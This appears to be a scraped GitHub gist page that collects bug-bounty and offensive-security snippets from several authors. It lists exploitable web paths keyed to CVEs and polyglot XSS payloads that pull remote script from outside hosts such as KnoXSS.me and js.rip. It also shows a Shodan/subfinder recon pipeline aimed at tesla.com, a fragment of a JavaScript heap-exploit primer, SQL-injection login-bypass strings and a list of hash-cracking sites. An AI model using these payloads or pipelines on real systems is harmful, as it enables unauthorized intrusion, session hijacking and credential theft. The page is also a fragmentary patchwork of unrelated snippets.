| Exploit/description | Path |
|---|---|
| Microsoft Office Online Server SSRF (relay) | /op/view.aspx |
| CVE-2017-11317 CVE-2019-18935 | /Telerik.Web.Ui.WebResource.axd?type=rau |
| CVE-2017-11317 CVE-2019-18935 | /Telerik.Web.UI.DialogHandler.aspx |
| CVE-2020-17519 | /jobmanager/logs/ |
| CVE-2017-7615 | /verify.php?id=1&confirm_hash= |
| CVE-2018-1000130 | /jolokia |
| CVE-2018-1000130 | /actuator/jolokia |
| leak | /actuator/env |
Halim Jabbes hxlxmjxbbxs
🚩
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Script/Src=//KnoXSS.me/00?1=1290></Script> | |
| '/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:KnoXSS.me\00?1=1290/.source))//> | |
| JavaScript://%250A0?1:import(/https:KnoXSS.me\00?1=1290/.source)//*'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(d=document,d.body.appendChild(d.createElement(/script/.source)).src=/https:\\KnoXSS.me\00?1=1290/.source)}//\76--> | |
| JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->"><img src=x onerror='fetch("https://js.rip/t9eoip8zws)'><script>$.getScript("//js.rip/t9eoip8zws")</script><script src="//js.rip/t9eoip8zws"></script> |
nullenc0de
/ Shodan_scan
Last active
July 5, 2023 18:13
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json |jq -r '.vulnerabilities[].cveID' > cves.txt | |
| subfinder -d tesla.com -silent |dnsx -silent -a -resp-only |sort -u |xargs -n1 -P 1500 -I% curl -s http://networktools.nl/whois/$url% |grep "CIDR" |cut -d : -f2 |tr , "\n"| awk '{$1=$1};1' |sort -u |egrep -v "/8|/9|/10|/11|/12|/13|/14|/15|/16" |while read ip ;do whois -h whois.cymru.com " -v $ip" ;done |grep -v "BGP Prefix" |cut -d '|' -f3 |awk '{$1=$1};1' |sort -u |cidr2ip |sort -u |nrich - |grep -B4 -f cves.txt | tee shodan.txt; slackcat --channel bugbounty --filename shodan.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off & setlocal | |
| if "%~1"=="" exit /b | |
| if /i "%~x1" neq ".bat" if /i "%~x1" neq ".cmd" exit /b | |
| <"%~1" ((for /l %%N in (1 1 8) do pause)>nul&findstr "^">"%~n1__%~x1") |
nullenc0de
/ api-linkfinder.sh
Created
August 7, 2021 11:17
Exports links and params from API documentation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml | |
| echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 |nuclei -t ./linkfinder.yaml -o api.txt | |
| cat api.txt |grep url_params |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_params.txt | |
| cat api.txt |grep relative_links |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_link_finder.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function sleep( sleepDuration ){ | |
| var now = new Date().getTime(); | |
| while(new Date().getTime() < now + sleepDuration){ /* do nothing */ } | |
| } | |
| function gc() { | |
| for (let i = 0; i < 0x10; i++) { | |
| new ArrayBuffer(0x1000000); | |
| } | |
| } | |
| let data_view = new DataView(new ArrayBuffer(8)); |
kafkaesqu3
/ exploitable_webpaths.md
Last active
May 7, 2024 09:38
easy wins - exploitable/leaky web paths
fuckup1337
/ JavascriptRecon.md
Created
January 18, 2021 20:02
My Javascript Recon Process - BugBounty
spenkk
/ sqli-auth-bypass.txt
Created
November 17, 2020 14:10
SQL Injection Authentication Bypass payloads
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| or 1=1 | |
| or 1=1-- | |
| or 1=1# | |
| or 1=1/* | |
| admin' -- | |
| admin' # | |
| admin'/* | |
| admin' or '1'='1 | |
| admin' or '1'='1'-- | |
| admin' or '1'='1'# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| LIST OF WEBSITES DEHASH / HASH ONLINE | |
| https://crackstation.net/ | |
| http://crypo.in.ua/tools/ | |
| http://www.md5decrypter.co.uk/ | |
| http://www.md5this.com/index.php | |
| http://md5hack.com/ | |
| http://www.miraclesalad.com/webtools/md5.php | |
| http://hash.online-convert.com/md5-generator | |
| http://md5decryption.com/ |
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
33927885 33m-subdomain-wordlist.txtNewerOlder